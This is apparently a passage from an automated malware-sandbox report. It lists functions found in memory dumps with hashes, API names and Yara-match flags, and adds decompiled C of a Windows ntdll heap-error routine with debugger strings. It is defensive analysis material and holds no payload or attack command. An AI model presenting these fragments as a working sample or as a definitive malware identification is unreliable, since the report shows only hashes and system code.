                                                                      • Instruction Fuzzy Hash: BD90027161101452414071B9884490A4005BBE1261761C121E4988650DC599886567A5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 12be80b5cf55956ebc187bbeea911c94c32ce792da461c4f066358a23a5200ee
                                                                      • Instruction ID: da9e3409535c43cfdbc4c210ecf0fe1ca4d87c40b32e227772ed0ce8faa01c56
                                                                      • Opcode Fuzzy Hash: 12be80b5cf55956ebc187bbeea911c94c32ce792da461c4f066358a23a5200ee
                                                                      • Instruction Fuzzy Hash: 5390027121141812D10061A9481470F0005A7D0352F61C011E5154655DC665885176B1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 39ef28459ca8c15048e955b6d9817467e2b1bd98826c541e382c12f7b75433a9
                                                                      • Instruction ID: fd74f2a82c17d61eda834c9eff345554c0773a7a40b43ecef18ee7c3c0251506
                                                                      • Opcode Fuzzy Hash: 39ef28459ca8c15048e955b6d9817467e2b1bd98826c541e382c12f7b75433a9
                                                                      • Instruction Fuzzy Hash: 4090027122181452D20065B94C14B0B0005A7D0353F61C115E4144654CC95588616661
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: c416c41861fa465c614b4da6d626d815c31df0d2e4be9d44bec6068ceb2e1d44
                                                                      • Instruction ID: 38d1bfe2cd39f05914e0b76a13b8f43cef4a63a74dd16369d88ac587f2bb90e2
                                                                      • Opcode Fuzzy Hash: c416c41861fa465c614b4da6d626d815c31df0d2e4be9d44bec6068ceb2e1d44
                                                                      • Instruction Fuzzy Hash: 88900275221014130105A5A9070450B0046A7D53A1361C021F5005650CD66188616261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012195D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 533ce3611e9e2ee72c220ef7a627951d9a77dcafe69ff62a4841f298f9aca948
                                                                      • Instruction ID: 88ae375321cc7a12653467ea6522f521f25bf8059b747a207f68e660a27a1454
                                                                      • Opcode Fuzzy Hash: 533ce3611e9e2ee72c220ef7a627951d9a77dcafe69ff62a4841f298f9aca948
                                                                      • Instruction Fuzzy Hash: D79002B121201413410571A9441461A400AA7E0251B61C021E5004690DC56588917265
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 182bbfcc4d55ae639db8fba5997192b04ede42c92d92225c151a860e2d84d85c
                                                                      • Instruction ID: 9368a7fe1f031f81b25ec2a14b6b0fa325746ad6eb58d58bcdf7b11db143b38d
                                                                      • Opcode Fuzzy Hash: 182bbfcc4d55ae639db8fba5997192b04ede42c92d92225c151a860e2d84d85c
                                                                      • Instruction Fuzzy Hash: ED90027121101812D10065E9540864A0005A7E0351F61D011E9014655EC6A588917271
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012197A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 51fd962fa8f12edcdf2519f548e1db0c42af0962393a0d276923556c258b100f
                                                                      • Instruction ID: 00759e2f20228d6c47c8857dda809b65cb878e1816340e1b052057d3e440e809
                                                                      • Opcode Fuzzy Hash: 51fd962fa8f12edcdf2519f548e1db0c42af0962393a0d276923556c258b100f
                                                                      • Instruction Fuzzy Hash: 9F90027131101413D14071A9541860A4005F7E1351F61D011E4404654CD95588566362
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 8e0010e3c2117c2f2db44d8ff0b18a34a2b492efe930bf004f65c8f3c34947c8
                                                                      • Instruction ID: db247ce974568f3da9d0737d0b8a35643ca5ec5a9f6d8d63e692312b277dffe8
                                                                      • Opcode Fuzzy Hash: 8e0010e3c2117c2f2db44d8ff0b18a34a2b492efe930bf004f65c8f3c34947c8
                                                                      • Instruction Fuzzy Hash: B390027922301412D18071A9540860E0005A7D1252FA1D415E4005658CC95588696361
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 03242081235227c21bab1393676267e407e54755998207d8ba44612e2b4756bd
                                                                      • Instruction ID: 9f32f979072bb6f62f8a4012691d3e4adfeca6bf3b32c4ff262a7f83973cbbed
                                                                      • Opcode Fuzzy Hash: 03242081235227c21bab1393676267e407e54755998207d8ba44612e2b4756bd
                                                                      • Instruction Fuzzy Hash: 7E90027132115812D11061A9840470A0005A7D1251F61C411E4814658DC6D588917262
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01219660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 6d79875ba86a5abc54e5e74de05e806175a0ecef5ed4e8ef86189584ac6eb531
                                                                      • Instruction ID: 850c9be054e57932477df38d809b417190aad082d2ecbbf130c2ab470e517f3e
                                                                      • Opcode Fuzzy Hash: 6d79875ba86a5abc54e5e74de05e806175a0ecef5ed4e8ef86189584ac6eb531
                                                                      • Instruction Fuzzy Hash: 8F90027121101C12D18071A9440464E0005A7D1351FA1C015E4015754DCA558A5977E1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 012196E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 00517df196e49d0ea2e6186c427eb12d2b21bd3181f93c3ee57d802f9202e04c
                                                                      • Instruction ID: 4707e3e4c5b1c55b7de46eeb4af81ad2f67d8e5cf503da2eabeebe486391945e
                                                                      • Opcode Fuzzy Hash: 00517df196e49d0ea2e6186c427eb12d2b21bd3181f93c3ee57d802f9202e04c
                                                                      • Instruction Fuzzy Hash: 3890027121109C12D11061A9840474E0005A7D0351F65C411E8414758DC6D588917261
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004088A0, Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 67c4254425f98e14c1a710a19429b94846c607caf1af295eb6ab99da40cf7e92
                                                                      • Instruction ID: 55514b722471499677bdd526f7fe8ce36723f69554e9c1deace4c3fed910bf3f
                                                                      • Opcode Fuzzy Hash: 67c4254425f98e14c1a710a19429b94846c607caf1af295eb6ab99da40cf7e92
                                                                      • Instruction Fuzzy Hash: 38213AB2C4420857CB20E6649D42BFF73BCAB50304F44057FE989A3181F638BB498BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: MessagePostThread
                                                                      • String ID:
                                                                      • API String ID: 1836367815-0
                                                                      • Opcode ID: 87cbcea00010dbcaf848e6f0e418591bfe7b58868e3b9ceab28d61565b59612d
                                                                      • Instruction ID: 5a072671537b26b6ed87b6c165d2972d8bf03b1b697a01369eb44fe348772ec6
                                                                      • Opcode Fuzzy Hash: 87cbcea00010dbcaf848e6f0e418591bfe7b58868e3b9ceab28d61565b59612d
                                                                      • Instruction Fuzzy Hash: 4B01A731A8032876E720A6959C03FFF776C5B40B55F15415EFF04BA1C2E6A87D0546FA
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004186C8, Relevance: 1.5, APIs: 1, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
                                                                      • Instruction ID: 8bc246f2462850e9cae5ba3bb82cc59fbcfe9b32184374d49ff2b326eb738374
                                                                      • Opcode Fuzzy Hash: 2383b15aae71cdd14fffb825e64e441733a0971417627929b0a1c622cb38846e
                                                                      • Instruction Fuzzy Hash: 1BF030B62142046BD710EF59DC45DE7779EEF84360B018559F90C97342C635E91086B4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004184B2, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: e22a01980c14078cf1fc370f0bea47ad020e6c00f99a04d607c05b6b025ab2a8
                                                                      • Instruction ID: 7306c21aaa6d986535a12e32f0a2237f273727f60a59211de1c72362dfdcedbd
                                                                      • Opcode Fuzzy Hash: e22a01980c14078cf1fc370f0bea47ad020e6c00f99a04d607c05b6b025ab2a8
                                                                      • Instruction Fuzzy Hash: ADF0EDB0200254ABCB14DF68CC49EEB3B68EF89314F25448DF9484B242CA30EC10CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004184C0, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FreeHeap
                                                                      • String ID:
                                                                      • API String ID: 3298025750-0
                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                      • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418480, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction ID: 95874ba5a5537b3d16e5bdcad340c4ef7a657c48911e570d945e23b5f838c0ed
                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                      • Instruction Fuzzy Hash: 7BE012B1200208ABDB14EF99DC41EE777ACAF88654F118559BA085B282CA30F9108AF4
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418620, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: LookupPrivilegeValue
                                                                      • String ID:
                                                                      • API String ID: 3899507212-0
                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction ID: 1821f594b7a2fedb3326d3670d224aab122327744fc2f581a2e4424e2d02315d
                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                      • Instruction Fuzzy Hash: 2AE01AB12002086BDB10DF49DC85EE737ADAF89650F018159BA0857241C934E8108BF5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 004184F2, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: 42f6b837cb2edad3ee9e8b08c655a1ddcbb15cfb22028f61be55e06547beb694
                                                                      • Instruction ID: 63c8b3cae4ba25db1c9da9a2fe72e7987aed1e5bba120d95b9a4d75c3da8bd9e
                                                                      • Opcode Fuzzy Hash: 42f6b837cb2edad3ee9e8b08c655a1ddcbb15cfb22028f61be55e06547beb694
                                                                      • Instruction Fuzzy Hash: 8EE0DF71204244BFD721DF64CC81ED7BF6DAF5A254F044198F989AB292C632AA00CBE0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418500, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.470161659.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ExitProcess
                                                                      • String ID:
                                                                      • API String ID: 621844428-0
                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction ID: 9f62bdc44f65d7d9a2483e28fb075f3ff631dd5cfbab79109080827007e6cc43
                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                      • Instruction Fuzzy Hash: 62D012716003147BD620DF99DC85FD7779CDF49750F018069BA1C5B241C931BA0086E5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 0121967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 3ccf79325444dfb02094fdb8097a881082f44758a5918427a674cd8c15a136ad
                                                                      • Instruction ID: f94de940e2d599f37548b82767ea01a67fe854108f02798d02dba0a128e2b2e1
                                                                      • Opcode Fuzzy Hash: 3ccf79325444dfb02094fdb8097a881082f44758a5918427a674cd8c15a136ad
                                                                      • Instruction Fuzzy Hash: ACB09B719115D5D9DA11D7B4460871B794077D0755F26C461D3020741F4778C0D1F6B5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      Function 0128B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • write to, xrefs: 0128B4A6
                                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0128B323
                                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0128B476
                                                                      • The resource is owned exclusively by thread %p, xrefs: 0128B374
                                                                      • This failed because of error %Ix., xrefs: 0128B446
                                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0128B39B
                                                                      • read from, xrefs: 0128B4AD, 0128B4B2
                                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0128B352
                                                                      • <unknown>, xrefs: 0128B27E, 0128B2D1, 0128B350, 0128B399, 0128B417, 0128B48E
                                                                      • *** enter .cxr %p for the context, xrefs: 0128B50D
                                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0128B38F
                                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0128B2F3
                                                                      • a NULL pointer, xrefs: 0128B4E0
                                                                      • The critical section is owned by thread %p., xrefs: 0128B3B9
                                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0128B53F
                                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0128B47D
                                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0128B305
                                                                      • *** Inpage error in %ws:%s, xrefs: 0128B418
                                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0128B3D6
                                                                      • The instruction at %p tried to %s , xrefs: 0128B4B6
                                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0128B314
                                                                      • *** then kb to get the faulting stack, xrefs: 0128B51C
                                                                      • Go determine why that thread has not released the critical section., xrefs: 0128B3C5
                                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0128B2DC
                                                                      • The instruction at %p referenced memory at %p., xrefs: 0128B432
                                                                      • The resource is owned shared by %d threads, xrefs: 0128B37E
                                                                      • an invalid address, %p, xrefs: 0128B4CF
                                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0128B484
                                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0128B48F
                                                                      • *** enter .exr %p for the exception record, xrefs: 0128B4F1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000A.00000002.477021051.00000000011B0000.00000040.00000001.sdmp, Offset: 011B0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                      • API String ID: 0-108210295
                                                                      • Opcode ID: 2d6fcf3b36cd2f4e9386a268fd849f9b3014f1903bc308054ea41c442705fe96
                                                                      • Instruction ID: 446075b9b056bf8a713f03d8e4007754b1ef4fadebc44b855d6713146ce058d7
                                                                      • Opcode Fuzzy Hash: 2d6fcf3b36cd2f4e9386a268fd849f9b3014f1903bc308054ea41c442705fe96
                                                                      • Instruction Fuzzy Hash: 72814975A21211FFDF2A6B4ADC96E7B3F29EF66A91F00005CF6041B192D3658451C7B2
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 01291C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 44%
                                                                      			E01291C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x11b48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011DB150();
				} else {
					E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x12c589c);
				E011DB150("Heap error detected at %p (heap handle %p)\n",  *0x12c58a0);
				_t27 =  *0x12c5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01291E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011DB150();
				} else {
					E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E011DB150("Error code: %d - %s\n",  *0x12c5898);
				_t113 =  *0x12c58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011DB150();
					} else {
						E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011DB150("Parameter1: %p\n",  *0x12c58a4);
				}
				_t115 =  *0x12c58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011DB150();
					} else {
						E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011DB150("Parameter2: %p\n",  *0x12c58a8);
				}
				_t117 =  *0x12c58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011DB150();
					} else {
						E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E011DB150("Parameter3: %p\n",  *0x12c58ac);
				}
				_t119 =  *0x12c58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E011DB150();
					} else {
						E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x12c58b4);
					E011DB150("Last known valid blocks: before - %p, after - %p\n",  *0x12c58b0);
				} else {
					_t120 =  *0x12c58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E011DB150();
				} else {
					E011DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E011DB150("Stack trace available at %p\n", 0x12c58c0);
			}











                                                                      0x01291c10
                                                                      0x01291c16
                                                                      0x01291c1e
                                                                      0x01291c3d
                                                                      0x01291c3e
                                                                      0x01291c20
                                                                      0x01291c35
                                                                      0x01291c3a
                                                                      0x01291c44
                                                                      0x01291c55
                                                                      0x01291c5a
                                                                      0x01291c65
                                                                      0x01291c67
                                                                      0x00000000
                                                                      0x01291c6e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x01291c67
                                                                      0x01291cdc
                                                                      0x01291ce5
                                                                      0x01291d04
                                                                      0x01291d05
                                                                      0x01291ce7
                                                                      0x01291cfc
                                                                      0x01291d01
                                                                      0x01291d0b
                                                                      0x01291d17
                                                                      0x01291d1f
                                                                      0x01291d25
                                                                      0x01291d30
                                                                      0x01291d4f
                                                                      0x01291d50
                                                                      0x01291d32
                                                                      0x01291d47
                                                                      0x01291d4c
                                                                      0x01291d61
                                                                      0x01291d67
                                                                      0x01291d68
                                                                      0x01291d6e
